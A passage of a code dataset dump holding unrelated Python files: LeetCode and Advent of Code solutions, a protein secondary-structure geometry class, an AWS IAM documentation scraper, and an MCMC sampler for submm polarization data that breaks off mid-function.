np.zeros((n,)*3, dtype=int)\n Z_3d[n//2] = data\n\n Z_4d = np.zeros((n,)*4, dtype=int)\n Z_4d[n//2, n//2] = data\n\n print(\"Part 1 —\", apply_conway_n_times(Z_3d, 6).sum())\n print(\"Part 2 —\", apply_conway_n_times(Z_4d, 6).sum())\n\n","sub_path":"src/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"626334850","text":"\"\"\"\nGiven a string, find the length of the longest substring without repeating characters. For example,the longest substring\nwithout repeating letters for \"abcabcbb\" is \"abc\", which the length is 3. For \"bbbbb\" the longest substring is \"b\", with\nthe length of 1.\n\"\"\"\n\n\nclass Solution(object):\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n \"\"\"\n left, right两个指针, 用map存字母的index. 要是发现right字母在map中,\n 更新left的位置, 再更新map中right字母的index. 计算max_len.\n \"\"\"\n if not s:\n return 0\n\n map_ = dict() # char -> index\n max_len = 0\n\n left = right = 0\n while right < len(s):\n if s[right] in map_:\n left = max(left, map_[s[right]] + 1)\n map_[s[right]] = right\n max_len = max(max_len, right - left + 1)\n right += 1\n return max_len\n\n def lengthOfLongestSubstring2(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n visited = [False] * 256\n i, max_len = 0, 0\n for j, char in enumerate(s):\n while visited[ord(char)]:\n visited[ord(s[i])] = False\n i += 1\n visited[ord(char)] = True\n max_len = max(max_len, j - i + 1)\n return max_len\n","sub_path":"Leetcode-Python/LongestSubstringWithoutRepeatingCharacters.py","file_name":"LongestSubstringWithoutRepeatingCharacters.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"452162481","text":"from collections import Counter\n\n\nclass Solution:\n def getHint(self, secret: str, guess: str) -> str:\n A = sum([secret[idx] == guess[idx] for idx in range(len(secret))])\n secret_dist = Counter(secret)\n guess_dict = Counter(guess)\n B = sum([min(secret_dist[key], guess_dict[key]) for key in secret_dist])\n return str(A) + \"A\" + str(B - A) + \"B\"\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.getHint(secret=\"1807\", guess=\"7810\"))\n print(s.getHint(secret=\"1123\", guess=\"0111\"))\n","sub_path":"LeetCode30DaysChallenge-202009/Bulls and Cows.py","file_name":"Bulls and Cows.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"313523841","text":"\"\"\"\njbonet @ boliva's lab 2013\n\"\"\"\nimport numpy as np\nfrom numpy import linalg as LA\nimport copy, sys\n\nclass SecondaryStructure(object):\n\n min_ss_length = {'H':4, 'E':2, 'G':3}\n max_ini_distance = {'H':8, 'E':2, 'G':6}\n structure_regions = set(['H','G','E'])\n\n def __init__(self, sstype, initposition):\n\n self._sstype = sstype\n self._inip = initposition\n self._struct = None\n self._endp = None\n self._length = None\n self._f11, self._cmf11, self._eigf11, self._tsf11 = None, None, None, None\n self._f44, self._cmf44, self._eigf44, self._tsf44 = None, None, None, None\n\n @property\n def structure(self):\n return self._struct\n \n def get_moment_of_inertia_length(self, workp):\n if workp == 'f11': (p1, p2) = (self._get_coordinate(self._f11), self._get_coordinate(self._endp))\n elif workp == 'f44': (p1, p2) = (self._get_coordinate(self._inip), self._get_coordinate(self._f44) )\n return p2 - p1 + 1\n\n def _get_coordinate(self, identifier):\n return self._struct._get_structure_array_coordinate(identifier)\n\n def calculate_center_of_masses(self):\n _struct = self._struct.duplicate(backbone = True)\n if self.max_ini_distance[self._sstype] >= self._length:\n self._f11 = self._inip\n self._f44 = self._endp\n self._cmf11 = _struct.geometric_center()\n self._cmf44 = self._cmf11\n else:\n self._f11 = _struct.aminoacids[ len(_struct.aminoacids) - self.max_ini_distance[self._sstype] ].identifier\n self._f44 = _struct.aminoacids[ self.max_ini_distance[self._sstype] - 1 ].identifier\n self._cmf11 = _struct.extract(self._f11, self._endp).geometric_center()\n self._cmf44 = _struct.extract(self._inip, self._f44).geometric_center()\n\n self._jacobi_angles('f11')\n if self._f11 != self._inip and self._f44 != self._endp:\n self._jacobi_angles('f44')\n if self._sstype == 'E': self._process_betas()\n else:\n self._eigf44 = self._eigf11 \n\n self._orientvectors()\n\n def _orientvectors(self):\n first_halfdif = np.subtract(self._struct.first_aminoacid.ca.coordinates, self._cmf44)\n second_halfdif = np.subtract(self._struct.last_aminoacid.ca.coordinates, self._cmf11)\n \n first_sign = -1 * np.sign(np.dot(first_halfdif, self._eigf44))\n second_sign = np.sign(np.dot(second_halfdif, self._eigf11))\n\n self._eigf44 = np.multiply(self._eigf44, first_sign)\n self._eigf11 = np.multiply(self._eigf11, second_sign)\n\n first_lambda = np.dot(first_halfdif, self._eigf44)\n second_lambda = np.dot(second_halfdif, self._eigf11)\n\n self._tsf44 = np.add(np.multiply(first_lambda, self._eigf44), self._cmf44)\n self._tsf11 = np.add(np.multiply(second_lambda, self._eigf11), self._cmf11)\n\n def _jacobi_angles(self, workp):\n _struct = self._struct.duplicate(backbone = True)\n if workp == 'f11':\n moving_point = self._f11\n fixed_point = self._endp\n ini_coord = _struct.extract(self._f11, self._endp)._all_atoms_coordinates()\n distance = len(ini_coord)/3\n cm = self._cmf11\n elif workp == 'f44':\n moving_point = self._f44\n ini_coord = _struct.extract(self._inip, self._f44)._all_atoms_coordinates()\n distance = len(ini_coord)/3\n cm = self._cmf44\n\n new_coord = np.subtract(ini_coord, cm)\n x2, y2, z2, xy, yz, zx = 0, 0, 0, 0, 0, 0\n if self._sstype != 'E':\n for row in new_coord:\n x, y, z = row\n x2 += np.power(x, 2)\n y2 += np.power(y, 2)\n z2 += np.power(z, 2)\n xy += np.multiply(x, y)\n yz += np.multiply(y, z)\n zx += np.multiply(z, x)\n else:\n for i in range(0, len(ini_coord) - 4, 3):\n j=i+3\n x0, y0, z0 = new_coord[i:i+3][:,0], new_coord[i:i+3][:,1], new_coord[i:i+3][:,2]\n x1, y1, z1 = new_coord[j:j+3][:,0], new_coord[j:j+3][:,1], new_coord[j:j+3][:,2]\n\n xm, ym, zm = np.mean([x0, x1], axis = 0), np.mean([y0, y1], axis = 0), np.mean([z0, z1], axis = 0)\n\n x2 += np.sum(np.power(xm, 2))\n y2 += np.sum(np.power(ym, 2))\n z2 += np.sum(np.power(zm, 2))\n xy += np.sum(np.multiply(xm, ym))\n yz += np.sum(np.multiply(ym, zm))\n zx += np.sum(np.multiply(zm, xm))\n\n a = np.matrix([[y2 + z2, -xy, -zx],\n [ -xy, x2 + z2, -yz],\n [ -zx, -yz, x2 + y2]])\n\n eigenVal, eigenVec = LA.eig(a)\n #sort eigenVal / eigenVec by descending eigenVal value\n #get the smallest value as represents the axis that actually follows the structure direction\n idx = eigenVal.argsort()[::-1]\n eigenVal = eigenVal[idx]\n eigenVec = eigenVec[:,idx]\n\n if workp == 'f11': self._eigf11 = np.asarray(eigenVec[:,2]).reshape(-1)\n elif workp == 'f44': self._eigf44 = np.asarray(eigenVec[:,2]).reshape(-1)\n\n def _process_betas(self):\n advance_limit = 2 #plus the two already selected makes a total of 4\n degree_dif_threshold = 10\n\n end, advance = False, 1\n original_eigienf11 = self._eigf11\n while not end:\n new_me = copy.deepcopy(self)\n _struct = new_me._struct.duplicate(backbone = True)\n new_me._f11 = new_me._struct.aminoacids[ len(new_me._struct.aminoacids) - (self.max_ini_distance[new_me._sstype] + advance)].identifier\n new_me._cmf11 = _struct.extract(new_me._f11, new_me._endp).geometric_center()\n\n new_me._jacobi_angles('f11')\n difference = np.degrees(np.arccos(np.absolute(np.dot(new_me._eigf11, original_eigienf11))))\n if new_me._f11 == new_me._inip or advance >= advance_limit: end = True\n advance += 1\n if difference < degree_dif_threshold:\n self._f11 = new_me._f11\n self._cmf11 = new_me._cmf11\n self._eigf11 = new_me._eigf11\n\n end, advance = False, 1\n original_eigienf44 = self._eigf44\n while not end:\n new_me = copy.deepcopy(self)\n _struct = new_me._struct.duplicate(backbone = True)\n new_me._f44 = new_me._struct.aminoacids[ self.max_ini_distance[new_me._sstype] - 1 + advance].identifier\n new_me._cmf44 = _struct.extract(new_me._inip, new_me._f44).geometric_center()\n\n new_me._jacobi_angles('f44')\n difference = np.degrees(np.arccos(np.absolute(np.dot(original_eigienf44, new_me._eigf44))))\n if new_me._f44 == new_me._endp or advance >= advance_limit: end = True\n advance += 1\n if difference < degree_dif_threshold:\n self._f44 = new_me._f44\n self._cmf44 = new_me._cmf44\n self._eigf44 = new_me._eigf44\n\n def headerformat(self, ssnum = 1, ssidentifier = 'A'):\n inires = self._struct.aminoacids[0]\n endres = self._struct.aminoacids[-1]\n if self._sstype == 'H' or self._sstype == 'G':\n ini = '{1.type} {0._struct.chain}{1.number:>5d}{1.version}'.format(self, inires)\n end = '{1.type} {0._struct.chain}{1.number:>5d}{1.version}'.format(self, endres)\n return 'HELIX {0:>4d} {1:>3s} {2} {3} 1 {4:>35d}'.format(ssnum, ssidentifier, ini, end, self._length)\n elif self._sstype == 'E':\n ini = '{1.type} {0._struct.chain}{1.number:>4d}{1.version}'.format(self, inires)\n end = '{1.type} {0._struct.chain}{1.number:>4d}{1.version}'.format(self, endres)\n return 'SHEET {0:>4d} {1:>3s} 1 {2} {3} 0'.format(ssnum, ssidentifier, ini, end)\n else:\n raise NotImplementedError('Unknown secondary structure type!')\n\n def strdata(self, workp):\n data = []\n data.append(\"( {0._sstype} ) {0._inip:>4s} <-- {0._length:>2d} --> {0._endp:>4s}\".format(self))\n if workp == 'f11':\n data.append(\"\\tf11: {0._f11:>4s} cmf11: {0._cmf11:>50s} eigf11: {0._eigf11:>50s}\".format(self))\n elif workp == 'f44':\n data.append(\"\\tf44: {0._f44:>4s} cmf44: {0._cmf44:>50s} eigf44: {0._eigf44:>50s}\".format(self))\n return \"\\n\".join(data)\n\n def __repr__(self):\n data = []\n data.append(\"( {0._sstype} ) {0._inip:>4s} <-- {0._length:>2d} --> {0._endp:>4s}\".format(self))\n data.append(\"\\tf11: {0._f11:>4s} cmf11: {0._cmf11:>50s} eigf11: {0._eigf11:>50s}\".format(self))\n data.append(\"\\tf44: {0._f44:>4s} cmf44: {0._cmf44:>50s} eigf44: {0._eigf44:>50s}\".format(self))\n # data.append(repr(self._struct))\n return \"\\n\".join(data)\n","sub_path":"collision_detection_program/SBI/structure/protein/SecondaryStructure.py","file_name":"SecondaryStructure.py","file_ext":"py","file_size_in_byte":9270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"131210133","text":"\"\"\"\nFunctions for downloading the AWS docs on Actions, Resources, and Condition Keys.\n\nThe initialize command uses this to download the docs to the ~/policy_sentry/data/docs folder.\nThe utils/get_docs\n\nWe store the HTML files in this manner so that the user can be more confident in the integrity of the data -\nthat it has not been altered in any way. The user can reproduce our steps with the original content at any time,\nor update the HTML files on their own.\n\"\"\"\n\nfrom os import listdir\nfrom os.path import isfile, join\nimport logging\nimport re\nfrom bs4 import BeautifulSoup\nimport yaml\nimport requests\nfrom policy_sentry.shared.constants import BASE_DOCUMENTATION_URL\n\nlogger = logging.getLogger(__name__) # pylint: disable=invalid-name\n\n\ndef get_links_from_base_actions_resources_conditions_page():\n \"\"\"Gets the links from the actions, resources, and conditions keys page, and returns their filenames.\"\"\"\n html = requests.get(BASE_DOCUMENTATION_URL)\n soup = BeautifulSoup(html.content, \"html.parser\")\n html_filenames = []\n for i in soup.find(\"div\", {\"class\": \"highlights\"}).findAll(\"a\"):\n html_filenames.append(i[\"href\"])\n return html_filenames\n\n\ndef update_html_docs_directory(html_docs_destination):\n \"\"\"\n Updates the HTML docs from remote location to either (1) local directory\n (i.e., this repository, or (2) the config directory\n :return:\n \"\"\"\n link_url_prefix = \"https://docs.aws.amazon.com/IAM/latest/UserGuide/\"\n initial_html_filenames_list = (\n get_links_from_base_actions_resources_conditions_page()\n )\n # Remove the relative path so we can download it\n html_filenames = [sub.replace(\"./\", \"\") for sub in initial_html_filenames_list]\n # Replace '.html' with '.partial.html' because that's where the current docs live\n html_filenames = [sub.replace(\".html\", \".partial.html\") for sub in html_filenames]\n\n for page in html_filenames:\n response = requests.get(link_url_prefix + page, allow_redirects=False)\n # Replace the CSS stuff. Basically this:\n \"\"\"\n \n \n \n \n \n \n list_amazonkendra.html downloaded\n \"\"\"\n soup = BeautifulSoup(response.content, \"html.parser\")\n for link in soup.find_all(\"link\"):\n if link.get(\"href\").startswith(\"/\"):\n temp = link.attrs[\"href\"]\n link.attrs[\"href\"] = link.attrs[\"href\"].replace(\n temp, f\"https://docs.aws.amazon.com{temp}\"\n )\n\n with open(html_docs_destination + page, \"w\") as file:\n # file.write(str(soup.html))\n file.write(str(soup.prettify()))\n file.close()\n logger.info(\"%s downloaded\", page)\n\n\n# Borrowed and altered from Parliament:\n# https://github.com/duo-labs/parliament/commit/2979e131ff3af9c79137817eaa57a05ae5007706#diff-1669fdcc34b13c17017fb2aae433801d\n# pylint: disable=invalid-name\ndef create_service_links_mapping_file(html_docs_destination, links_yml_file):\n \"\"\"Parses the AWS HTML docs to create a YML file that understands the mapping between services and HTML files.\"\"\"\n prefix_list = []\n links_shortened = {}\n for filename in [\n f\n for f in listdir(html_docs_destination)\n if isfile(join(html_docs_destination, f))\n ]:\n if not filename.startswith(\"list_\"):\n continue\n\n with open(html_docs_destination + filename, \"r\") as f:\n soup = BeautifulSoup(f.read(), \"html.parser\")\n main_content = soup.find(id=\"main-content\")\n if main_content is None:\n continue\n\n # Get service name\n # title = main_content.find(\"h1\", class_=\"topictitle\")\n # title = re.sub(\".*Actions, Resources, and Condition Keys for *\", \"\", str(title))\n # title = title.replace(\"\", \"\")\n # service_name = chomp(title)\n\n # prefix = \"\"\n for c in main_content.find(\"h1\", class_=\"topictitle\").parent.children:\n if \"prefix\" in str(c):\n prefix = str(c)\n prefix = prefix.split('')[1]\n prefix = prefix.split(\"\")[0]\n prefix = chomp(prefix)\n prefix_list.append(prefix)\n if prefix not in links_shortened:\n links_shortened[prefix] = [filename]\n else:\n links_shortened[prefix].append(filename)\n break\n\n links_dict = {}\n for key, value in sorted(links_shortened.items()):\n links_dict[key] = value\n with open(links_yml_file, \"w+\") as outfile:\n yaml.dump(links_dict, outfile, default_flow_style=False)\n outfile.close()\n prefix_list.sort()\n prefix_list = list(dict.fromkeys(prefix_list))\n logger.info(\"Created the service-to-links YML mapping file: \", links_yml_file)\n return prefix_list\n\n\ndef get_list_of_service_prefixes_from_links_file(links_yml_file):\n \"\"\"\n Gets a list of service prefixes from the links file. Used for unit tests.\n :return:\n \"\"\"\n # links_yml_file = os.path.abspath(os.path.dirname(__file__)) + '/data/links.yml'\n service_prefixes = []\n with open(links_yml_file, \"r\") as yaml_file:\n try:\n cfg = yaml.safe_load(yaml_file)\n except yaml.YAMLError as exc:\n logger.critical(exc)\n for service_name in cfg:\n service_prefixes.append(service_name)\n return service_prefixes\n\n\n# Borrowed from Parliament:\n# https://github.com/duo-labs/parliament/commit/2979e131ff3af9c79137817eaa57a05ae5007706#diff-1669fdcc34b13c17017fb2aae433801d\ndef chomp(string):\n \"\"\"This chomp cleans up all white-space, not just at the ends\"\"\"\n string = str(string)\n response = string.replace(\"\\n\", \" \") # Convert line ends to spaces\n response = re.sub(\n \" [ ]*\", \" \", response\n ) # Truncate multiple spaces to single space\n response = re.sub(\"^[ ]*\", \"\", response) # Clean start\n return re.sub(\"[ ]*$\", \"\", response) # Clean end\n","sub_path":"policy_sentry/scraping/awsdocs.py","file_name":"awsdocs.py","file_ext":"py","file_size_in_byte":6738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"148226511","text":"# -*- coding: utf-8 -*-\r\nimport sys\r\nsys.path.append(\"..\")\r\nfrom utils.FileCreator import FileCreator, HtmlProperty\r\nfrom utils.WebLoader import WebLoader\r\n\r\n\r\ndef main():\r\n FileCreator().execute_all(\"../training/data/\")\r\n webLoader = WebLoader()\r\n webLoader.execute_all(\"../training/entities/\")\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"main/create_files.py","file_name":"create_files.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"256346783","text":"'''\nWrite a program (function!) that takes a list and\nreturns a new list that contains all the elements of the first list minus all the duplicates.\n\nExtras:\n\nWrite two different functions to do this - one using a loop and constructing a list, and another using sets.\nGo back and do Exercise 5 using sets, and write the solution for that in a different function.\n'''\n\na = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89]\nb = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]\n\ndef removeDuplicates(a,b):\n lst = a\n [lst.append(i) for i in b if i not in lst]\n return lst\n\nprint(removeDuplicates(a,b))","sub_path":"removeDuplicate.py","file_name":"removeDuplicate.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"237812743","text":"\"\"\"\nModule for sampling background polarisation and stellar polarisation\nin submm.\n\"\"\"\n\nimport numpy as np\nimport healpy as hp\nimport tools_mod as tools\nimport matplotlib.pyplot as plt\nimport sys, time\nfrom functools import partial\n\n\n\ndef QU_sampler(QU, qu, x_mean, x_err, mask, data_mean,\\\n Nside=256, Niter=1000, R_Pp=None):\n \"\"\"\n Input:\n - QU, 2d array of submm polarization (2, Npix)\n - qu, 2d array of visual polarization (2, Npix)\n - x_mean, seq. of mean parameters values to be fitted. \n (R_Pp, Qbkgr, Ubkgr)\n ...\n Return:\n QU stat and background. list of arrays\n \"\"\"\n \n print(x_mean)\n print(x_err)\n burnin = int(Niter/2) \n print(burnin)\n cov0 = Cov(x_mean)\n pixels = np.arange(hp.nside2npix(Nside))\n QU_model = np.zeros((2, hp.nside2npix(Nside)))\n QU_err = np.zeros((2, hp.nside2npix(Nside)))\n params_maxL = np.zeros((len(x_mean), hp.nside2npix(Nside)))\n params = np.zeros((Niter, len(x_mean), hp.nside2npix(Nside)))\n\n #print(R_Pp)\n dt_mean = np.array([-R_Pp, np.zeros(len(mask)), np.zeros(len(mask))])\n print('-----------')\n mod = QU_func(data_mean, qu[:,mask])\n mod2 = QU_func(dt_mean, qu[:,mask])\n #print(QU[:,mask], np.mean(QU[:,mask], axis=1), np.std(QU[:,mask], axis=1))\n #print(mod, np.mean(mod, axis=1), np.std(mod, axis=1))\n #print(mod2, np.mean(mod2, axis=1), np.std(mod2, axis=1))\n #print(logLike(mod, QU[:,mask]))\n #print(QU_func(np.array([-R_Pp[0], -0.005, 0.025]), qu[:,mask[0]]))\n res = (QU[:,mask] - mod)/QU[:,mask]\n res2 = (QU[:,mask] - mod2)/QU[:,mask]\n #print(res/res2)\n print(np.mean(QU[:,mask]/qu[:,mask], axis=1))\n print(np.mean(R_Pp*qu[0,mask]), np.mean(R_Pp*qu[1,mask]))\n\n \"\"\"\n plt.scatter(res[0,:], res[1,:], marker='.', c=R_Pp, cmap='jet', vmin=3.8,\\\n vmax=5.2)\n plt.colorbar()\n plt.grid(True)\n plt.figure()\n plt.scatter(qu[0,mask], QU[0,mask], marker='x', c='k')\n plt.scatter(qu[1,mask], QU[1,mask], marker='x', c='b')\n #plt.scatter(qu[0,mask], mod[0], marker='.', c=R_Pp, cmap='jet')\n #plt.scatter(qu[1,mask], mod[1], marker='.', c=R_Pp, cmap='jet')\n plt.scatter(qu[0,mask], mod2[0], marker='.', c=R_Pp, cmap='brg',\\\n vmin=3.8, vmax=5.2)\n plt.scatter(qu[1,mask], mod2[1], marker='.', c=R_Pp, cmap='brg',\\\n vmin=3.8, vmax=5.2)\n plt.colorbar()\n \"\"\"\n t0 = time.time()\n for i, pix in enumerate(pixels[mask]):\n t01 = time.time()\n \n # Initiate functions:\n log_like = partial(logLike, data=QU[:,pix])\n log_prior = partial(logPrior, mu=data_mean, sigma=x_err)\n func = partial(QU_func, qu=qu[:,pix])\n \n # Initialize:\n params0, model0, loglike0, logprior0 = Initialize(log_like,\\\n log_prior,\\\n func, x_mean,\\\n cov0)\n\n # Metropolis Hastrings:\n params_maxL[:,pix], params[:,:,pix] = MH(log_like, log_prior,\\\n func, params0, model0,\\\n loglike0, logprior0,\\\n x_mean, cov0, burnin, Niter)\n\n #\n print(QU[:,pix], QU_func(params_maxL[:,pix], qu[:,pix]))\n #QU_model[:,pix] = QU_func(params_maxL[:,pix], qu[:,pix])\n #QU_err[:,pix] = None\n #print(np.mean(params[:,:,pix],axis=0), np.std(params[:,:,pix],axis=0))\n t11 = time.time()\n print('Sampling time for pixel {}: {} s'.format(pix, t11-t01))\n print('-->')\n #break\n #\n t2 = time.time()\n print('Total sampling time: {} s'.format(t2-t0))\n print('===================')\n #plot_params(params_maxL, xlab=[], ylab=[])\n #plot_params(params, hist=True, xlab=[], ylab=[])\n #plot_params(params, xlab=[], ylab=[])\n #print(params_maxL[:, mask])\n plt.subplot(311)\n plt.plot(params_maxL[0,mask], '.r')\n plt.subplot(312)\n plt.plot(params_maxL[1,mask], '.k')\n plt.subplot(313)\n plt.plot(params_maxL[2,mask], '.b')\n print(np.mean(params_maxL[:,mask], axis=1), np.std(params_maxL[:,mask], axis=1))\n print(np.shape(QU_err[:,mask]))\n params_err = error_est(params[burnin:,:,mask], model=False)\n QU_model[:, mask] = QU_func(params_maxL[:,mask], qu[:,mask])\n QU_err[:,mask] = error_est(params[burnin:,:,mask], qu[:,mask], model=True)\n\n res_mod = (QU[:,mask]-QU_model[:,mask])/QU[:,mask]\n #print(QU_model[:,mask])\n print(np.mean(QU[:,mask], axis=1), np.std(QU[:,mask], axis=1))\n print(np.mean(QU_model[:,mask], axis=1), np.std(QU_model[:,mask], axis=1))\n #print(res_mod)\n\n R_mod = np.sqrt((QU_model[0,mask]**2 + QU_model[1,mask]**2) \\\n / (qu[0,mask]**2 + qu[1,mask]**2))\n \n plt.figure()\n plt.plot(R_Pp, R_mod, '.g')\n plt.plot(R_Pp, -params_maxL[0,mask], '.r')\n\n print('Stellar and background polarisation')\n QU_star = QUstar(params_maxL[0,mask], qu[:,mask])\n QU_bkgr = QUbkgr(params_maxL[1:,mask])\n print(np.mean(QU[:,mask], axis=1))\n print(np.mean(QU_star, axis=1), np.std(QU_star, axis=1))\n print(np.mean(QU_bkgr, axis=1), np.std(QU_bkgr, axis=1))\n print(np.mean(R_mod), np.std(R_mod))\n plot_model1(qu, QU, QU_model, R_Pp)\n #\"\"\"\n plt.figure()\n plt.scatter(qu[0,mask], QU_star[0,:], c='k', marker='^')\n plt.scatter(qu[1,mask], QU_star[1,:], c='b', marker='^')\n plt.scatter(qu[0,mask], QU_model[0,mask], c='grey', marker='^')\n plt.scatter(qu[1,mask], QU_model[1,mask], c='skyblue', marker='^')\n \n plt.figure()\n plt.scatter(qu[0,mask], QU_bkgr[0,:], c='k', marker='^')\n plt.scatter(qu[1,mask], QU_bkgr[1,:], c='b', marker='^')\n #plt.ylim(-0.01, 0.015)\n #\"\"\"\n return None\n\ndef Initialize(log_like, log_prior, model_func, mean, cov):\n \"\"\"\n Initialization of the parameters and functions.\n \"\"\"\n \n curr_params = proposal_rule(cov, mean)\n #print('curr params:', curr_params)\n curr_model = model_func(curr_params)\n #print('model', curr_model)\n curr_like = log_like(curr_model)\n #print('curr like:', curr_like)\n curr_prior = log_prior(curr_params)\n #print('curr prior:', curr_prior)\n return(curr_params, curr_model, curr_like, curr_prior)\n\ndef MH(log_like, log_prior, model_func, curr_params, curr_model,\\\n curr_like, curr_prior, mean, cov, burnin, Niter=1000):\n\n \"\"\"\n The Metropolis Hastings algorthm.\n \"\"\"\n accept = np.zeros(Niter)\n params = np.zeros((Niter, len(mean)))\n counter = 0\n steplength = 1\n max_like = -50\n maxL_params = curr_params\n\n # Sampling loop:\n for i in range(Niter):\n # propose new parameters:\n prop_params = proposal_rule(cov*steplength, mean)\n \n # call MH_step: \n accept[i], curr_params, maxL_params, max_like =\\\n MH_step(log_like, log_prior,\\\n model_func, prop_params,\\\n curr_params, curr_like,\\\n curr_prior, max_like,\\\n maxL_params)\n params[i,:] = curr_params\n #print(accept[i], prop_params)\n # define current model, logL and logPrior from accepted parameters:\n curr_model_new = model_func(curr_params)\n curr_like = log_like(curr_model_new)\n curr_prior = log_prior(curr_params)\n mean = curr_params\n # update the steplength in the covariance matrix:\n if accept[i] == True:\n counter += 1\n \n if (i+1)%50 == 0:\n if counter/float(i+1) < 0.2:\n steplength /= 2\n elif counter/float(i+1) > 0.5:\n steplength *= 2\n else:\n pass\n\n # make new covariance matrix from the drawn parameters:\n if (i+1)%200 == 0:\n cov = Cov(params[:i,:].T)\n #print(i, curr_params, curr_like)\n #print(cov)\n #\n print(counter/float(Niter))\n print('max.like. {}, max.like. params:'.format(max_like), maxL_params)\n mod = model_func(curr_params)\n modL = model_func(maxL_params)\n print(mod)\n print(modL)\n print(np.mean(params[burnin:,:],axis=0),np.std(params[burnin:,:],axis=0))\n \n #plt.subplot(311)\n #plt.plot(params[:,0])\n #plt.subplot(312)\n #plt.plot(params[:,1])\n #plt.subplot(313)\n #plt.plot(params[:,2])\n #plt.show()\n return(maxL_params, params)\n\n\ndef MH_step(log_like, log_prior, model_func, prop_params, curr_params,\\\n curr_like, curr_prior, max_like, maxL_params):\n\n \"\"\"\n The step in the MH algorithm\n \"\"\"\n # proposed model: \n prop_model = model_func(prop_params)\n prop_like = log_like(prop_model)\n prop_prior = log_prior(prop_params)\n\n # posterior: \n post_old = curr_like + curr_prior\n post_new = prop_like + prop_prior\n #print(prop_prior, curr_prior, prop_like, curr_like)\n # acceptance testing: \n a = np.exp(post_new - post_old)\n draw = np.random.uniform(0, 1)\n #print(a, draw, post_old, post_new)\n if (a > draw) and (a < np.inf):\n accept = True\n curr_params = prop_params\n if prop_like > max_like:\n max_like = prop_like\n maxL_params = curr_params\n else:\n accept = False\n curr_params = curr_params\n # \n return(accept, curr_params, maxL_params, max_like)\n \n\ndef logLike(model, data, sigma=0.01):\n L = -0.5*((data - model)/sigma)**2\n return(np.sum(L))\n\ndef logPrior(params, mu=None, sigma=None):\n pm = 0\n for i in range(len(params)):\n pm += -0.5*((params[i] - mu[i])/sigma[i])\n return(pm)\n\ndef proposal_rule(cov, mean=None):\n \"\"\"\n Draw new parameters for proposal. \n \"\"\"\n params = np.random.multivariate_normal(mean, cov)\n # check if R_Pp has the right sign? should be negative\n params[0] = test_params(params[0], mean[0], cov[0,0], crit='a')\n params[1] = test_params(params[1], mean[1], cov[1,1], crit='bq')\n params[2] = test_params(params[2], mean[2], cov[2,2], crit='bu')\n #print(params)\n return(params)\n\ndef test_params(p, mean, cov, crit='q', i=0):\n if crit != 'a':\n while p >= 0:\n p = np.random.normal(mean, np.sqrt(cov))\n i += 1\n if i > 10:\n break\n return(p)\n elif crit == 'bq':\n while abs(p) > 1:\n p = np.random.normal(mean, np.sqrt(cov))\n i += 1\n if i > 10:\n break\n return(p)\n elif crit == 'bu':\n while (abs(p) > 1):\n p = np.random.normal(mean, np.sqrt(cov))\n i += 1\n if i > 10:\n break\n return(p)\n else:\n return(p)\n\ndef Cov(x):\n if np.ndim(x) == 1:\n N = len(x)\n return(np.eye(N))\n else:\n return(np.cov(x))\n\ndef QU_func(params, qu):\n \"\"\"\n Input:\n - params, list. (R_Pp, Qbkgr, Ubkgr)\n - qu, 2d array of visula pol.\n return\n QU array\n \"\"\"\n\n QU = np.array([params[0]*qu[0] + params[1],\\\n params[0]*qu[1] + params[2]])\n return(QU)\n\ndef QUstar(a, qu):\n \"\"\"\n Estimate the submm polarisation contribution from stellar parts\n \"\"\"\n return(a*qu)\n\ndef QUbkgr(bs):\n \"\"\"\n Estimate the background polarisation \n \"\"\"\n return(np.array([bs[0,:], bs[1,:]]))\n\ndef error_est(params, qu=None, model=True):\n \"\"\"\n Function to estimate the uncertainties of the model, or for each\n parameter\n \n Input:\n - params, array with all sampled parameter values after burnin\n - qu, array with the visual polarization data\n - model, bool. If True estimate uncertainties for the model, else\n estimate uncertainties of the parameters.\n Returns:\n uncertianties for model or parameters\n \"\"\"\n #print(np.shape(params))\n if model is True:\n print('uncertainties for model')\n QU = np.zeros((len(params[:,0,0]), 2, len(qu[0,:])))\n for i in range(len(params[:,0,0])):\n QU[i,:,:] = QU_func(params[i,:,:], qu)\n print(np.shape(QU)) # (500,2,30)\n QU_err = np.std(QU, axis=0)\n #print(QU_err) \n return QU_err\n else:\n print('Uncertainties for parameters')\n params_err = np.std(params, axis=0)\n #print(np.shape(params_err))\n return(params_err)\n\ndef plot_model1(qu, QU, mod, R_mod):\n plt.figure()\n plt.scatter(qu[0,mask], QU[0,mask], c='grey', marker='^', label='data')\n plt.scatter(qu[1,mask], QU[1,mask], c='skyblue', marker='^')\n plt.scatter(qu[0,mask], QU_model[0,mask], c=R_mod, marker='.', cmap='brg',\\\n vmin=3.8, vmax=5.2, label='model')\n plt.scatter(qu[1,mask], QU_model[1,mask], c=R_mod, marker='.', cmap='brg',\\\n vmin=3.8, vmax=5.2)\n cbar = plt.colorbar()\n cbar.set_label(r'$R_{{P/p}}$ [MJy/sr]')\n plt.xlabel(r'$q, u$')\n plt.ylabel(r'$Q, U$ [MJy/sr]')\n plt.title('Plot data vs model')\n plt.savefig('Figures/correlations/test/model_vs_data_sampler.png')\n\ndef plot_params(p, hist=False, xlab=None, ylab=None):\n if np.dim(p) == 3:\n print('plot histogram of returned samples')\n f1, (ax1, ax2) = plt.subplots(2,1)\n if hist is True:\n for i in range(len(p[0,0,:])):\n 